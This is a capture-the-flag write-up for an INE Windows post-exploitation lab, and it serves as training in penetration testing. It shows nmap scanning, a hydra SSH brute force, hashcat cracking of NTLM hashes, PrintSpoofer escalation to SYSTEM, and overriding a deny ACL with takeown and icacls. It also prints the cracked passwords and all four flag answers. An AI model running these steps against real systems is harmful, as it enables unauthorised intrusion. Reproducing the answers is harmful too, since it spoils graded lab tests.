Skip to content

Post-Exploitation CTF 2

Overview

This lab involves exploiting a Windows target machine. By identifying insecure configurations, cracking hashes, and leveraging privilege escalation techniques, you'll uncover and capture the flags. Challenges include exploiting an insecure SSH user, cracking password hashes, escalating privileges and overcoming restricted access to files.

Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.

Lab Environment
A target machine is accessible at target.ine.local. Identify the services and capure the flags.

Flag 1: An insecure ssh user named alice lurks in the system.
Flag 2: Using the hashdump file discovered in the previous challenge, can you crack the hashes and compromise a user?
Flag 3: Can you escalate privileges and read the flag in C://Windows//System32//config directory?
Flag 4: Looks like the flag present in the Administrator's home denies direct access.
The following will be useful:

Wordist: /usr/share/wordlists/metasploit/unix_passwords.txt
Tool: /root/Desktop/PrintSpoofer.exe

Writeup

Flag 1

We used nmap on the target:

┌──(root㉿INE)-[~/Desktop]
└─# nmap --min-rate=10000 -p- target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-15 12:27 IST
Nmap scan report for target.ine.local (10.4.30.21)
Host is up (0.0098s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE    SERVICE
22/tcp    open     ssh
135/tcp   open     msrpc
139/tcp   open     netbios-ssn
445/tcp   open     microsoft-ds
3389/tcp  open     ms-wbt-server
[...]

We then ran nmap on specific ports:

┌──(root㉿INE)-[~/Desktop]
└─# nmap -p22,135,139,445,3389,18837,23920,25377,32621,32747,49152,49153,49154,49155,49170,49181 -sC -sV target.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-15 12:29 IST
[...]
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required
[...]

The CTF overview suggested an insecure SSH user named alice. We attempted to brute-force the SSH port using hydra and the provided wordlist.

┌──(root㉿INE)-[~/Desktop]
└─# hydra -l alice -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://target.ine.local
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
[...]
[22][ssh] host: target.ine.local   login: alice   password: princess1

We found the credentials alice:princess1. After connecting via SSH, we located the first flag.

alice@WIN-GQ7PTVEC6HL C:\Users\alice>dir
 Volume in drive C has no label.
 Volume Serial Number is AEDF-99BD

 Directory of C:\Users\alice
[...]
05/15/2025  06:52 AM                34 flag1.txt
[...]
Answer

3144e5983aa44960ab6e139b27e3ac06

Flag 2

We took the hashdump and used hashcat to crack it.

┌──(root㉿INE)-[~/Desktop]
└─# hashcat -m 1000 hashdump.txt /usr/share/wordlists/metasploit/unix_passwords.txt
hashcat (v6.2.6) starting
[...]
8883a4229c5553c9cca6856a53011e4c:princess1
ca8e025e9893e8ce3d2cbf847fc56814:orange
[...]

We found the password orange corresponding to the user david. After logging in via SSH, we found the flag.

 Directory of C:\Users\david
[...]
05/15/2025  06:52 AM                34 flag2.txt
[...]
Answer

df38e2347d184376a810eeb4acb52d7f

Flag 3

We checked our privileges:

[...]

We had the "SeImpersonate" privilege, allowing us to use PrintSpoofer or a Potato tool for privilege escalation. Since PrintSpoofer was already on the machine, we transferred it to the Windows system using scp.

┌──(root㉿INE)-[~/Desktop]
└─# scp PrintSpoofer64.exe david@target.ine.local:.
david@target.ine.local's password:
PrintSpoofer64.exe

We executed it:

david@WIN-GQ7PTVEC6HL C:\Users\david>PrintSpoofer64.exe cmd
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

Then accessed the flag:

C:\Windows\system32>cd config

C:\Windows\System32\config>dir
[...]
05/15/2025  06:52 AM                34 flag3.txt
[...]

Flag 4

We tried accessing the final flag:

C:\Users\Administrator>whoami
nt authority\system

C:\Users\Administrator>cd flag
Access is denied.

Despite being Administrator, we couldn't view the folder. We took ownership of the folder:

C:\Users\Administrator> takeown /F flag /R

SUCCESS: The file (or folder): "C:\Users\Administrator\flag" now owned by user "WORKGROUP\WIN-GQ7PTVEC6HL$".
[...]

We checked permissions:

C:\Users\Administrator>icacls flag
flag NT AUTHORITY\SYSTEM:(OI)(CI)(DENY)(RX)
     BUILTIN\Administrators:(F)
[...]

We removed the restrictive permission:

icacls flag /remove "NT AUTHORITY\SYSTEM"

C:\Users\Administrator>cd flag

C:\Users\Administrator\flag>type flag4.txt
Answer

c5b52164d6e24c7c823b70b77cf318cc